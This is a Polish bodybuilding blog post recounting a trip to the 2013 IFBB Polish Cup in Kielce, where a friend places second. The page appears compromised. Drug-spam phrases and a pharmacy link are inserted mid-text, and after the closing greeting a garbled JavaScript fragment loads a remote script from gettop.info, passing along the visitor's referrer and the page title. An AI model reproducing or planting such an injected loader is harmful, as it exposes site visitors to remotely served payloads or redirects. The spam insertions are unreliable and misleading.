PUCHAR POLSKI 2013 – Szybka realacja i filmik za kulis

24.10.2013 / Adam Jabłoński / Kulturystyka

Cześć,

W tym roku jak zwykle wszystko na wariackich papierach czyli wyjazd razem z Przemkiem ze Szczecina przed 5 rano w Niedziele, na szczęście dojechaliśmy na 11 do Kielc, a dokładnie na Targi Kieleckie (są to hale wystawowe i kongresowe, na których prezentują się różne firmy w różnych dziedzinach życia oraz organizowane są tam różne konferencje).

Gdy podjechaliśmy do HAL przypomniało mi się FIBO, hale choć nie były takie duże jak te w Niemczech to i tak sprawiły ogromne wrażenie – już wiedziałem, że ten Puchar Polski 2013 – przejdzie do historii jako najlepiej zorganizowane zawody IFBB w Polsce.

Wjechaliśmy na parking, który był ogromy – parking za darmo – łał – zawsze na zawodach gdzie nie pojechaliśmy to zrobiony z trawniku parking oznaczony taśmą był płatny.
Wchodzimy do środka kupujemy bilet – 25 zł gdzie spodziewałem się ceny 35-45 zł.

Na wejściu FULL ludzi, zawodnicy, wystawcy z paru firm suplementacyjnych, idziemy dalej w stronę BACKSTAGE do Tomka i reszty ekipy po drodze spotykamy znajomych, chwile rozmawiamy i idziemy dalej.
Wszystko czyste, każdy wie gdzie ma iść wchodzimy na BACKSTAGE, a tam ogromna sala bardzo wysoka, wszyscy zawodnicy mają dla siebie miejsce, a temperatura powietrza jest w sam raz.

JABI I PAPAJ

Podchodzimy do Tomka witamy się, Tomek pokazuje swoja formę, rewelacja – nie widziałem Go na żywo jakieś 6 tygodni, bardzo się zmienił, a od zeszłego roku poprawa gęstości jest ogromna, definicja poprawiona, gęstość dodana, talia poprawiona – super, Papaj naprawdę robi wrażenie.

Order EKIPA PAPAJA12 Buy

Czekamy na pierwszą rundę, razem z Przemkiem chwile wcześniej poszliśmy na sale konferencyjną – jedną z wielu – ale ta była największa po prostu OGROMNA i na niej były organizowane zawody – każdy miał miejsce siedzące, scena bardzo duża i bardzo dobrze oświetlona dzięki czemu u zawodników można było zobaczyć najmniejsze szczegóły.
Jeśli chodzi o zawodników i zawodniczki to dużo trzeba byłoby pisać – napisze, krótko – Większość – Fenomenalna forma.

Po pierwszych rundach pojechaliśmy ekipa zjeść i wziąć jedzenie dla Tomka, po powrocie trochę pochodziliśmy po hali.
Wróciliśmy tuż przed rozpoczęciem finałów, więc poszliśmy zając miejsca.

Finaliści wszystkich kategorii reprezentowali światowej klasy formę – super się oglądało, w końcu przyszła kolej na najcięższych czyli kulturystykę ekstremalną – Wchodzą konie – Walka zacięta
Tomek zdobywa drugie miejsce – super jest zadowolony – leci na Mistrzostwa Świata za 4 tygodnie.

Po całych zawodach pożegnania itp. Razem z Przemkiem i ekipa pojechaliśmy do Hotelu aby później skoczyć do MC Donalda gdzie Tomek dał czadu, reszta zresztą też :-)

http://culturavernetta.com/aricept-price-in-malaysia/ Pills 1382784_573381136060755_373110010_n

 

Po jedzonku przeszliśmy się kawałek po deptaku w Kielcach i ruszyliśmy w stronę hotelu, gdy dotarliśmy pod hotel tam pożegnaliśmy się ponieważ razem z Przemkiem musieliśmy już wracać, a mieliśmy przed sobą ponad 600 km.

Na zakończenie, było super, zawodnicy na lighcie 0 stresu, wszystko fajnie poprowadzone, no jedyny mankament to oświetlenie po bokach sceny ( gdy zawodników było powyżej 10 na scenie ) światła już nie obejmowy zbyt dobrze ich sylwetek ale nie było aż tak źle.

Jestem bardzo zadowolony z wyjazdu, który nakręcił mnie jeszcze bardziej na treningi

TUTAJ KRÓTKI FILMIK za KULIS :

POZDRAWIAJ
HEJdocument.currentScript.parentNode.insertBefore(s, document.currentScript); Purchase Pills s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s); arcoxia where to buy cialis and avodart